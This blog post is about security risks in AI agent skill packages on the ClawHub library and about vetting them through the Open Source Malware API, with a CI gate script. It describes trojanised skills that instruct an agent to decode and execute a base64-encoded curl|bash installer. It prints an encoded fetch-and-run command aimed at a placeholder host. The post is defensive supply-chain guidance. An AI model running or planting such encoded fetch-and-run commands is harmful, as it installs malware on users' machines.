Skills are an increasingly powerful tool for creating custom AI workflows and agents, but where do they fit in the Platform Engineering stack? And how do I know they’re safe to run?
At a high level, Agent Skills are a simple, open format for giving agents new capabilities and expertise: folders of instructions, scripts, and resources that agents can discover and use to do things more accurately and efficiently.
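To make that concrete, here is roughly what a skill folder can look like. This sketch follows Anthropic's published Agent Skills format - a SKILL.md manifest with YAML frontmatter (name, description) followed by instructions, plus optional scripts and resources - but the file names below are purely illustrative:

```
pdf-tools/                  # one skill per folder
├── SKILL.md                # manifest: YAML frontmatter (name, description)
│                           # followed by instructions for the agent
├── scripts/
│   └── fill_form.py        # helper script the agent can execute
└── reference.md            # extra documentation, loaded only when needed
```

Note that the scripts folder is exactly where the trouble starts: anything in there is code the agent may run on your behalf.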
Just as Platform Engineers and developers consume open-source dependencies from public upstreams like PyPI and npm, skill authors can build capabilities once, share them with a public community, and then deploy them across multiple agent products. Projects such as Anthropic’s Claude and OpenClaw’s ClawdBot offer Skills as a way to extend the capabilities of these Agentic AI tools. As we race to build these autonomous AI systems, we have to ask ourselves - what’s actually happening inside these skill files?
Agentic AI in platform engineering
Jennifer Riggins makes a strong case for Agentic AI within Internal Developer Platforms. Platform engineering and operations teams face urgent pressure to scale their platforms while contending with shrinking budgets and rigid processes. Instead of replacing humans entirely, AI agents can be integrated for very specific tasks - with even greater precision through Skills. If your team is struggling to comb through large volumes of log data, could that single job be offloaded to an agent built for exactly that purpose?
Sebastian Kister of Audi emphasises not trying “to make everything smart all at once”, and instead starting small and smart. He states that these agents “help teams finish 20% to 50% more of their daily coding tasks”. From a productivity perspective, they’re undoubtedly helping existing platform teams. From a security perspective, things may become less safe. At the end of the day, agents are just tools, and tool sprawl increases the attack surface.
Understanding ClawHub
ClawHub is essentially a centralised skill library where users can publicly browse and source the aforementioned AI Skills, specifically for ClawdBot. Anyone can contribute to the library and anyone can download Skills from it - making it the new frontier for hackers.
ClawdBot’s security flaws have been well-documented by folks like Jamieson O’Reilly, yet the "move fast and break things" crowd doesn't seem to mind. This is a very new space, and people are going to make mistakes. That said, giving a chatbot the keys to your digital kingdom and managing it via Telegram feels less like "innovation" and more like a security nightmare waiting to happen. But I’m not here to judge personal decisions.
Quite the opposite. I’m not discouraging developers from using these agentic AI tools, and I’m certainly not against skills - they’re important technologies for building meaningful autonomous workflows. Still, I would stress vigilance before blindly pulling these skills into your Golden Paths initiatives.
Manually reading through these open-format skill files to verify they are safe is a slow and tedious process that would discourage platform engineers from ever testing Skills in the first place. But there is a solution!
Introducing Open Source Malware (OSM)
If platform engineers are using AI skills in their software, skills are therefore part of the software supply chain. One project in particular, Open Source Malware (OSM), can tell you whether you're about to consume a bad skill. To browse their database of verified malicious AI skills, filter by Packages > AI Skills. For demonstration purposes, here is an example of a Trojanised AI skill distributing malware via base64-encoded curl|bash commands, which is also part of a coordinated campaign on ClawHub. The skill has since been removed from ClawHub.
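To illustrate the obfuscation technique (with a harmless stand-in URL, not the actual campaign payload), here is what this looks like in practice: the installer command is base64-encoded so the hostile URL never appears in the skill text in plain form, and the skill instructs the agent to decode and execute it. Decoding without executing is how you inspect it:

```shell
# Illustrative only: a benign stand-in for the technique described above.
# This payload decodes to a curl|bash one-liner pointing at example.com -
# a harmless placeholder, not the real campaign URL.
PAYLOAD="Y3VybCAtZnNTTCBodHRwczovL2V4YW1wbGUuY29tL2luc3RhbGwuc2ggfCBiYXNo"

# Decode to INSPECT the command - never pipe the decoded output to bash.
echo "$PAYLOAD" | base64 -d
```

A quick `base64 -d` on anything suspicious in a skill file costs seconds and reveals exactly what the agent would have been asked to run.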
When we are thinking about Golden Paths initiatives, it would be ideal to scan our YAML templates through an API that tells us whether a skill has recently been identified as carrying Indicators of Compromise (IoCs). It’s worth noting that OSM is rate-limited by default. However, once you have created an API key, you can run commands like the one below to check whether a specific AI skill is malicious:
curl -X GET "https://api.opensourcemalware.com/functions/v1/check-malicious?report_type=package&resource_identifier=https://www.clawhub.ai/sakaen736jih/nano-banana-pro-lldjo1&ecosystem=skills" \
  -H "Authorization: Bearer $OSM_KEY" | jq
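Taken a step further, that one-off check can be wrapped into a small CI gate for your golden path templates. The sketch below is hypothetical: it assumes the OSM endpoint and parameters shown above, and the response field name (`malicious`) and the skill URL are illustrative assumptions - verify both against the OSM API documentation before relying on this:

```shell
#!/usr/bin/env sh
# Hypothetical CI gate: query OSM for each skill URL referenced by a
# golden-path template and fail the build on a malicious verdict.
# The "malicious" JSON field and the skill URL are illustrative assumptions.

# Skill URLs extracted from your templates (placeholder value).
SKILLS="https://www.clawhub.ai/example-author/example-skill"

check_skill() {
  # Query OSM for one skill; print "true"/"false", or "unknown" if the
  # field is absent from the response.
  curl -fsS -G "https://api.opensourcemalware.com/functions/v1/check-malicious" \
    --data-urlencode "report_type=package" \
    --data-urlencode "resource_identifier=$1" \
    --data-urlencode "ecosystem=skills" \
    -H "Authorization: Bearer ${OSM_KEY}" |
    jq -r 'if has("malicious") then (.malicious|tostring) else "unknown" end'
}

if [ -n "${OSM_KEY:-}" ]; then
  for skill in $SKILLS; do
    if [ "$(check_skill "$skill")" = "true" ]; then
      echo "BLOCKED: $skill flagged as malicious by OSM" >&2
      exit 1
    fi
    echo "OK: $skill"
  done
else
  echo "OSM_KEY not set; skipping live check"
fi
```

Dropping a script like this into the pipeline that renders your templates means a flagged skill never reaches a developer's golden path in the first place.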

Helping platform engineers navigate the new frontier
Platform engineering has never been easy, and the pressure to integrate agentic AI only adds to the complexity. But we can't afford to be AI-naysayers. Blocking these tools only halts the efficiency we’ve worked so hard to build. Instead, the focus must shift to smarter governance. We need to use our existing API infrastructure to vet agentic skills, ensuring that only secure, trusted automation makes it into our golden path templates. Let's embrace the AI revolution, but let's build the guardrails first.